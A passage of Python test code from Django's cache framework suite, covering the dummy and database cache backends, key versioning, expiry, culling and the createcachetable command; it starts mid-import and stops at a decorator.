from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable(object):
def __getstate__(self):
raise pickle.PickleError()
class UnpicklableType(object):
# Unpicklable using the default pickling protocol on Python 2.
__slots__ = 'a',
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
def test_get_or_set_version(self):
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian')
with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = six.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
